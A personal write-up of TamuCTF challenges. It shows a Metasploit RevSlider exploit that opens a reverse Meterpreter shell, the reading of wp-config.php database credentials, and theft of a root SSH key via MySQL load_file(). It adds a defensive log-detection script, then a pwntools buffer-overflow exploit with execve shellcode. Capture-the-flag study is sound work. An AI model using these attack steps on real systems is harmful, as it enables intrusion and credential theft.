TamuCTF writeup
TamuCTF was a nine-day-long CTF, and many of the challenges were practical ones that can be used in the real world. This is the fifth time I have participated in a CTF, and personally I think it was easier than usual. I still need to learn more of the basics, as I got almost no points in the Android, Network, ReadingRainbow, and Web categories. As each Honeypot challenge had an extraordinarily big file, I couldn't download it! Eventually, I finished 322nd out of 1896 teams. Anyway, I need to practice more web, reversing, pwn, and networking challenges.
This post includes writeups for the following challenges.
Network
Wordpress
We find two hosts with nmap.
Then we open host 172.30.0.3 on port 80.
curl -v 172.30.0.3
The server hosts a WordPress site. The hint in the title says the flag is at /root/flag.txt, so we look for a way to get access to host 172.30.0.3 and read it. Then we run wpscan to detect vulnerable components.
wpscan --url 172.30.0.3
We find two vulnerabilities. The first one is a file read vulnerability:
Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1579
The second one is a file upload vulnerability.
WordPress Plugin Slider REvolution 3.0.95 / Showbiz Pro 1.7.1 - Arbitrary File Upload
Unfortunately, the flag can only be read with root privileges, so a file read performed as the web server user does not help us; we focus on the second vulnerability instead.
In this case we can use Metasploit.
$ msfconsole
[-] Failed to connect to the database: could not connect to server: Connection refused
Is the server running on host "localhost" (::1) and accepting
TCP/IP connections on port 5432?
could not connect to server: Connection refused
Is the server running on host "localhost" (127.0.0.1) and accepting
TCP/IP connections on port 5432?
cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
=[ metasploit v4.17.3-dev ]
-- --=[ 1795 exploits - 1019 auxiliary - 310 post ]
-- --=[ 538 payloads - 41 encoders - 10 nops ]
-- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > search revslider
[!] Module database cache not built yet, using slow search
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/unix/webapp/wp_revslider_upload_execute 2014-11-26 excellent WordPress RevSlider File Upload and Execute Vulnerability
msf > use exploit/unix/webapp/wp_revslider_upload_execute
msf exploit(unix/webapp/wp_revslider_upload_execute) > set RHOST 172.30.0.3
RHOST => 172.30.0.3
msf exploit(unix/webapp/wp_revslider_upload_execute) > exploit
[*] Started reverse TCP handler on 172.30.0.14:4444
[+] Our payload is at: /wp-content/plugins/revslider/temp/update_extract/revslider/xyXWLY.php
[*] Calling payload...
[*] Sending stage (37775 bytes) to 172.30.0.3
[*] Meterpreter session 1 opened (172.30.0.14:4444 -> 172.30.0.3:32924) at 2019-03-05 04:29:29 -0500
[+] Deleted xyXWLY.php
[+] Deleted ../revslider.zip
meterpreter > pwd
/var/www/wp-content/plugins/revslider/temp/update_extract/revslider
meterpreter > shell
Process 78 created.
Channel 0 created.
python -c 'import pty; pty.spawn("/bin/bash")'
<t/plugins/revslider/temp/update_extract/revslider$ pwd
pwd
/var/www/wp-content/plugins/revslider/temp/update_extract/revslider
<t/plugins/revslider/temp/update_extract/revslider$ cd /var/www
cd /var/www
www-data@apacheword:/var/www$ ls
ls
index.php wp-admin wp-cron.php wp-mail.php
license.txt wp-blog-header.php wp-includes wp-settings.php
note.txt wp-comments-post.php wp-links-opml.php wp-signup.php
readme.html wp-config.php wp-load.php wp-trackback.php
wp-activate.php wp-content wp-login.php xmlrpc.php
www-data@apacheword:/var/www$ cat note.txt
cat note.txt
Your ssh key was placed in /backup/id_rsa on the DB server.
As mentioned, we can't open the flag file because flag.txt can only be read by root. But here we have found an important piece of information: if we can obtain the private key at /backup/id_rsa on the DB server, we can log in as root over ssh. Significant information may also be hidden inside the configuration file wp-config.php, so we check it.
www-data@apacheword:/var/www$ cat wp-config.php
cat wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'wordpress');
/** MySQL database password */
define('DB_PASSWORD', '0NYa6PBH52y86C');
/** MySQL hostname */
define('DB_HOST', '172.30.0.2');
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
...
We got the DB password.
Connect to the DB:
mysql -u wordpress -h 172.30.0.2 -p wordpress
Enter password:
MySQL [wordpress]> select load_file('/backup/id_rsa');
Then we get the RSA private key. This works because load_file() reads the file with the privileges of the MySQL server process and the wordpress DB user has the FILE privilege, which it does not need for a blog.
We can use this private key to log in as root.
nano pkey.key
Copy and paste the RSA private key into a key file (here named pkey.key).
Set a passphrase on the key, then generate the public key from it:
ssh-keygen -p -f pkey.key
Enter new passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved with the new passphrase.
root@fang:~# ssh-keygen -y -f pkey.key > pkey.pub
Enter passphrase:
Use the private key to perform SSH authentication as root (load it into the agent first):
root@fang:~# ssh-add pkey.key
Enter passphrase for pkey.key:
Identity added: pkey.key (pkey.key)
root@fang:~# ssh root@172.30.0.3
X11 forwarding request failed on channel 0
Welcome to Ubuntu 14.04 LTS (GNU/Linux 4.4.0-141-generic x86_64)
* Documentation: https://help.ubuntu.com/
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
root@apacheword:~# ls
flag.txt
root@apacheword:~# cat flag.txt
gigem{w0rd_pr3ss_b3st_pr3ss_409186FC8E2A45FE}
Access granted.
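As an added example that is not part of the original writeup, the following Python script shows how a defender would spot the two wpscan findings above in Apache access logs: a revslider_show_image request whose img parameter contains ".." (the CVE-2015-1579 traversal) and a request for a PHP file under revslider/temp/update_extract/ (where the Metasploit module placed its payload). The log lines are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache access-log lines (not from the challenge). The first is
# an ordinary admin-ajax call; the other two have the request shapes of the
# two wpscan findings: traversal through the revslider_show_image action and
# execution of a PHP file dropped under revslider/temp/update_extract/.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Mar/2019:04:20:01 -0500] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 12
10.0.0.9 - - [05/Mar/2019:04:25:13 -0500] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3125
10.0.0.9 - - [05/Mar/2019:04:29:29 -0500] "GET /wp-content/plugins/revslider/temp/update_extract/revslider/xyXWLY.php HTTP/1.1" 200 0
"""

# Common log format: client, identd, user, [timestamp], "METHOD target proto", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
UPLOAD_DIR_RE = re.compile(r"/plugins/revslider/temp/update_extract/.*\.php$", re.I)


def classify(line):
    """Return an alert tag for one access-log line, or None if it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    params = parse_qs(url.query)  # percent-decodes, so %2e%2e is caught as ".."
    action = params.get("action", [""])[0]
    img = params.get("img", [""])[0]
    if url.path.endswith("/admin-ajax.php") and action == "revslider_show_image" and ".." in img:
        return "revslider_traversal"
    if UPLOAD_DIR_RE.search(url.path):
        return "revslider_upload_exec"
    return None


def scan(log_text):
    """Return (client ip, alert tag, request target) for every suspicious line."""
    alerts = []
    for line in log_text.splitlines():
        tag = classify(line)
        if tag:
            m = LOG_RE.match(line)
            alerts.append((m.group("ip"), tag, m.group("target")))
    return alerts


if __name__ == "__main__":
    for ip, tag, target in scan(SAMPLE_LOG):
        print(f"{tag:22} {ip:12} {target}")
```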
PWN
pwn3
Python code:
from pwn import *

p = remote("pwn.tamuctf.com", 4323)

# The service prints a line containing the buffer's address; take the tenth
# space-separated field and keep only the "0x........" prefix.
k = p.recvline()
print k
k = k.split(" ")[9]
k = k[:10]
bufferLocation = p32(int(k, 16))

# 28-byte execve("/bin//sh") shellcode for 32-bit Linux, followed by exit()
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"

# Shellcode at the start of the buffer, NOP padding up to 298 bytes, 4 bytes of
# filler, then the leaked buffer address overwrites the saved return address.
payload = ""
payload += shellcode
payload += "\x90" * (298 - len(shellcode))
payload += "A" * 4
payload += bufferLocation

p.sendline(payload)
p.sendline("cat flag.txt")
p.interactive()